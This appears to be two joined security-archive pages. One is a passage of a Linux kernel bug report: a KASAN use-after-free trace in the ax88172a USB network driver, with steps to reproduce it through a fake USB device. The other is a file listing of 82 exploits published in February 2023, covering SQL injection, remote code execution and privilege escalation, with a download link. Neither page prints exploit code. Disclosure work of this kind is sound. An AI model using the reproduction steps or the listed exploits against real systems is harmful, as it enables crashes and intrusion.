unregister_netdevice_many+0x158/0x740 [ 149.336816] ? kfree+0x218/0x250 [ 149.337573] unregister_netdevice_queue+0xcb/0x110 [ 149.338361] unregister_netdev+0x18/0x20 [ 149.339112] usbnet_disconnect+0x59/0xb0 [usbnet] [ 149.339864] usb_unbind_interface+0x8a/0x270 [usbcore] [ 149.340616] __device_release_driver+0x22d/0x240 [ 149.341358] device_release_driver+0x24/0x30 [ 149.342112] bus_remove_device+0xd8/0x140 [ 149.342840] device_del+0x18b/0x3f0 [ 149.343573] ? kobject_put+0x91/0x1d0 [ 149.344307] usb_disable_device+0xc6/0x1e0 [usbcore] [ 149.345056] usb_disconnect.cold+0x7b/0x24d [usbcore] [ 149.345802] hub_event+0xc4c/0x1880 [usbcore] [ 149.346571] ? preempt_count_sub+0x81/0x90 [ 149.347313] process_one_work+0x1e5/0x3b0 [ 149.348055] ? rescuer_thread+0x370/0x370 [ 149.348795] worker_thread+0x50/0x3a0 [ 149.349531] ? rescuer_thread+0x370/0x370 [ 149.350292] kthread+0xe7/0x110 [ 149.351030] ? kthread_complete_and_exit+0x20/0x20 [ 149.351771] ret_from_fork+0x22/0x30 [ 149.352504] </TASK> [ 149.353234] Modules linked in: cdc_ether(E) asix(E) selftests(E) usbnet(E) mii(E) nfnetlink(E) rfkill(E) zstd(E) zstd_compress(E) zram(E) zsmalloc(E) intel_rapl_msr(E) intel_rapl_common(E) x86_pkg_temp_thermal(E) intel_powerclamp(E) coretemp(E) nls_ascii(E) nls_cp437(E) vfat(E) snd_hda_codec_realtek(E) kvm_intel(E) fat(E) snd_hda_codec_generic(E) snd_hda_codec_hdmi(E) ledtrig_audio(E) kvm(E) irqbypass(E) snd_hda_intel(E) crc32_pclmul(E) snd_intel_dspcfg(E) snd_intel_sdw_acpi(E) snd_hda_codec(E) iTCO_wdt(E) intel_pmc_bxt(E) iTCO_vendor_support(E) snd_hda_core(E) at24(E) mei_hdcp(E) watchdog(E) ghash_clmulni_intel(E) snd_hwdep(E) snd_pcm_oss(E) snd_mixer_oss(E) rapl(E) r8169(E) intel_cstate(E) intel_uncore(E) efi_pstore(E) pcspkr(E) realtek(E) snd_pcm(E) mdio_devres(E) i2c_i801(E) snd_timer(E) mei_me(E) i2c_smbus(E) snd(E) ehci_pci(E) sg(E) libphy(E) soundcore(E) ehci_hcd(E) mei(E) lpc_ich(E) button(E) msr(E) parport_pc(E) ppdev(E) parport(E) fuse(E) configfs(E) efivarfs(E) ip_tables(E) [ 149.353267] x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) dm_crypt(E) dm_mod(E) raid10(E) raid456(E) libcrc32c(E) crc32c_generic(E) async_raid6_recov(E) async_memcpy(E) async_pq(E) async_xor(E) xor(E) async_tx(E) raid6_pq(E) raid1(E) raid0(E) multipath(E) linear(E) md_mod(E) hid_generic(E) usbhid(E) hid(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) evdev(E) crc32c_intel(E) i915(E) i2c_algo_bit(E) ahci(E) xhci_pci(E) libahci(E) drm_kms_helper(E) xhci_hcd(E) cec(E) rc_core(E) libata(E) ttm(E) aesni_intel(E) crypto_simd(E) usbcore(E) scsi_mod(E) cryptd(E) scsi_common(E) drm(E) usb_common(E) video(E) [ 149.360796] ---[ end trace 0000000000000000 ]--- [ 149.362505] ------------[ cut here ]------------ In my test VM with a bunch of kernel debugging enabled, I get this KASAN splat (shown here without guess frames) when I attach the same fake USB device through an emulated HCD: BUG: KASAN: use-after-free in ax88172a_stop+0xab/0xc0 Read of size 8 at addr ffff88800c684e48 by task kworker/0:2/33 CPU: 0 PID: 33 Comm: kworker/0:2 Not tainted 5.17.0-rc4-00054-gf71077a4d84b #949 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: usb_hub_wq hub_event Call Trace: <TASK> dump_stack_lvl+0x45/0x59 print_address_description.constprop.0+0x1f/0x150 kasan_report.cold+0x7f/0x11b ax88172a_stop+0xab/0xc0 usbnet_stop+0x13d/0x390 __dev_close_many+0x18c/0x290 dev_close_many+0x18a/0x3f0 unregister_netdevice_many+0x2f8/0x1420 unregister_netdevice_queue+0x1dc/0x280 unregister_netdev+0x18/0x20 usbnet_disconnect+0x118/0x260 usb_unbind_interface+0x182/0x7e0 __device_release_driver+0x531/0x670 device_release_driver+0x26/0x40 bus_remove_device+0x2ae/0x570 device_del+0x490/0xb50 usb_disable_device+0x294/0x600 usb_disconnect.cold+0x1fb/0x68b hub_event+0x1472/0x39d0 process_one_work+0x91d/0x15d0 worker_thread+0x57b/0x1240 kthread+0x2a5/0x350 ret_from_fork+0x22/0x30 </TASK> Allocated by task 33: kasan_save_stack+0x1e/0x40 __kasan_kmalloc+0x81/0xa0 ax88172a_bind+0x95/0x7b0 usbnet_probe+0xa62/0x2370 usb_probe_interface+0x27d/0x760 really_probe+0x475/0xbd0 __driver_probe_device+0x18f/0x470 driver_probe_device+0x49/0x120 __device_attach_driver+0x199/0x250 bus_for_each_drv+0x125/0x1b0 __device_attach+0x1e0/0x3d0 bus_probe_device+0x1a5/0x260 device_add+0x971/0x1a70 usb_set_configuration+0x92b/0x1600 usb_generic_driver_probe+0x79/0xa0 usb_probe_device+0xab/0x250 really_probe+0x475/0xbd0 __driver_probe_device+0x18f/0x470 driver_probe_device+0x49/0x120 __device_attach_driver+0x199/0x250 bus_for_each_drv+0x125/0x1b0 __device_attach+0x1e0/0x3d0 bus_probe_device+0x1a5/0x260 device_add+0x971/0x1a70 usb_new_device.cold+0x47d/0xb88 hub_event+0x20c7/0x39d0 process_one_work+0x91d/0x15d0 worker_thread+0x57b/0x1240 kthread+0x2a5/0x350 ret_from_fork+0x22/0x30 Freed by task 33: kasan_save_stack+0x1e/0x40 kasan_set_track+0x21/0x30 kasan_set_free_info+0x20/0x30 __kasan_slab_free+0xe0/0x110 kfree+0xa5/0x2b0 usbnet_disconnect+0xe7/0x260 usb_unbind_interface+0x182/0x7e0 __device_release_driver+0x531/0x670 device_release_driver+0x26/0x40 bus_remove_device+0x2ae/0x570 device_del+0x490/0xb50 usb_disable_device+0x294/0x600 usb_disconnect.cold+0x1fb/0x68b hub_event+0x1472/0x39d0 process_one_work+0x91d/0x15d0 worker_thread+0x57b/0x1240 kthread+0x2a5/0x350 ret_from_fork+0x22/0x30 If you want to test this yourself, you can use the USB raw gadget (https://www.kernel.org/doc/html/latest/usb/raw-gadget.html) with dummy_hcd. Compile the attached testcase, then run it as \"./usb-ax88172a dummy_udc dummy_udc.0\", wait a few seconds for the device to come up, and press CTRL+C to trigger USB disconnect. This requires CONFIG_USB_DUMMY_HCD=y and CONFIG_USB_RAW_GADGET=y. Found by: jannh@google.com Source

This archive contains all of the 82 exploits added to Packet Storm in February, 2023. Directory of \2302-exploits 03/02/2023 05:20 PM <DIR> . 03/02/2023 05:20 PM <DIR> .. 02/07/2023 06:45 PM 2,617 101newsbymk10-sql.txt 02/23/2023 06:38 PM 3,253 acdme78-sqlexecxsstraversal.txt 02/24/2023 09:35 PM 4,018 adms10-escalate.txt 02/24/2023 09:43 PM 12,008 adms10-sql.txt 02/17/2023 05:40 PM 1,816 argondashboard112-sql.txt 02/16/2023 05:36 PM 1,445 atrocore1525-shell.txt 02/17/2023 06:03 PM 776 bestposms10-shell.txt 02/17/2023 05:57 PM 4,253 bestposms10-sql.txt 02/17/2023 05:59 PM 3,919 bestposms10-xss.txt 02/15/2023 08:16 PM 8,615 CDSR-20230213-0.txt 02/10/2023 05:45 PM 2,727 chikoi10-traversal.txt 02/10/2023 05:42 PM 1,582 chikoi10-xss.txt 02/28/2023 06:02 PM 1,650 churchcrm453-sql.txt 02/14/2023 05:32 PM 7,374 cisco_rv340_lan.rb.txt 02/15/2023 07:55 PM 1,872 CVE-2022-45701.py.txt 02/01/2023 07:56 PM 5,177 cve_2022_1043_io_uring_priv_esc.rb.txt 02/03/2023 04:54 PM 3,875 cve_2022_3699_lenovo_diagnostics_driver.rb.txt 02/17/2023 05:42 PM 10,352 demanzomatrimony15-xsrf.txt 02/01/2023 07:49 PM 5,605 empc17-sql.txt 02/01/2023 07:47 PM 5,347 empc17-xss.txt 02/24/2023 09:45 PM 4,424 etms10-escalate.txt 02/24/2023 09:47 PM 8,004 etms10-sql.txt 02/03/2023 04:49 PM 6,035 f5_create_user.rb.txt 02/09/2023 06:34 PM 4,495 fortra_goanywhere_rce_cve_2023_0669.rb.txt 02/23/2023 06:34 PM 10,784 froxlor_log_path_rce.rb.txt 02/15/2023 08:22 PM 8,928 gitlab_github_import_rce_cve_2022_2992.rb.txt 02/13/2023 04:59 PM 1,503 globalinfotechcms10-sql.txt 02/06/2023 06:36 PM 10,376 GS20230206163255.tgz 02/06/2023 06:45 PM 17,460 GS20230206163837.tgz 02/09/2023 06:27 PM 6,200 GS20230209162439.tgz 02/10/2023 05:26 PM 11,376 GS20230210152355.tgz 02/10/2023 05:31 PM 7,825 GS20230210152910.tgz 02/10/2023 05:34 PM 3,408 GS20230210153345.tgz 02/10/2023 05:37 PM 5,163 GS20230210153626.tgz 02/24/2023 09:49 PM 5,191 GS20230224194934.tgz 02/27/2023 05:15 PM 4,180 GS20230227151433.tgz 02/17/2023 06:26 PM 5,960 kardexmlogvcc5712-exec.txt 02/24/2023 09:28 PM 1,911 kshitish20-insecure.txt 03/02/2023 05:20 PM 0 list.txt 02/03/2023 04:51 PM 4,302 mac_dirty_cow.rb.txt 02/08/2023 06:29 PM 7,656 manageengine_adselfservice_plus_saml_rce_cve_2022_47966.rb.txt 02/09/2023 06:35 PM 8,122 manageengine_endpoint_central_saml_rce_cve_2022_47966.rb.txt 02/07/2023 07:23 PM 8,947 manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb.txt 02/07/2023 06:42 PM 1,770 materialdashboard2-sql.txt 02/28/2023 06:05 PM 1,940 mefidot22-insecure.txt 02/28/2023 06:07 PM 1,823 mefidot22-sql.txt 02/24/2023 10:45 PM 4,383 mgs10-escalate.txt 02/24/2023 10:47 PM 11,354 mgs10-sql.txt 02/10/2023 05:40 PM 1,957 Monitorrv1.7.6_RCE.py.txt 02/08/2023 06:27 PM 10,004 nagios_xi_configwizards_authenticated_rce.rb.txt 02/27/2023 05:20 PM 4,519 NWSSA-001-2023.txt 02/27/2023 05:28 PM 3,807 NWSSA-002-2023.txt 02/01/2023 07:46 PM 3,036 onlineeyewearshop10-sql.txt 02/03/2023 04:43 PM 4,456 oracle12102-escalate.txt 02/27/2023 04:38 PM 2,746 pfblockerng2146-exec.txt 02/22/2023 06:38 PM 5,216 pyload_js2py_exec.rb.txt 02/15/2023 08:29 PM 5,809 SA-20230214-0.txt 02/21/2023 06:53 PM 1,604 salestrackerssytem10-sql.txt 02/24/2023 10:51 PM 3,617 sfos10-sql.txt 02/06/2023 06:49 PM 6,665 tomcat_ubuntu_log_init_priv_esc.rb.txt 02/01/2023 07:54 PM 6,287 vmwgfx_fd_priv_esc.rb.txt 02/10/2023 05:32 PM 9,045 weby125-xsrf.txt 02/15/2023 08:25 PM 2,873 wpqsm808-delete.txt 02/15/2023 08:27 PM 2,669 wpqsm808-xsrf.txt 02/28/2023 07:00 PM 5,384 wprealestate7theme334-abuse.txt 02/28/2023 07:07 PM 18,593 wprealestate7theme334-xsrf.txt 02/28/2023 07:20 PM 3,335 wprealestate7theme334-xss.txt 02/28/2023 06:46 PM 3,967 wpwoodmarttheme710-inject.txt 02/28/2023 07:24 PM 4,960 wpwoodmarttheme711-xsrf.txt 02/14/2023 05:24 PM 8,712 xworm21-dos.txt 02/23/2023 06:27 PM 4,565 ycrs10-sql.txt 02/17/2023 05:46 PM 1,984 zabbix627-escalate.txt 02/09/2023 06:41 PM 22,748 ZSL-2023-5744.txt 02/28/2023 06:55 PM 4,746 ZSL-2023-5745.txt 02/28/2023 07:03 PM 3,709 ZSL-2023-5746.txt 02/28/2023 07:04 PM 4,202 ZSL-2023-5747.txt 02/28/2023 07:10 PM 3,600 ZSL-2023-5748.txt 02/28/2023 07:12 PM 3,486 ZSL-2023-5749.txt 02/28/2023 07:15 PM 3,701 ZSL-2023-5750.txt 02/28/2023 07:16 PM 3,458 ZSL-2023-5751.txt 02/28/2023 07:18 PM 6,075 ZSL-2023-5752.txt 02/28/2023 07:22 PM 4,896 ZSL-2023-5753.txt 02/28/2023 07:28 PM 11,942 ZSL-2023-5754.txt Download: 202302-exploits.tgz (186.5 KB) Source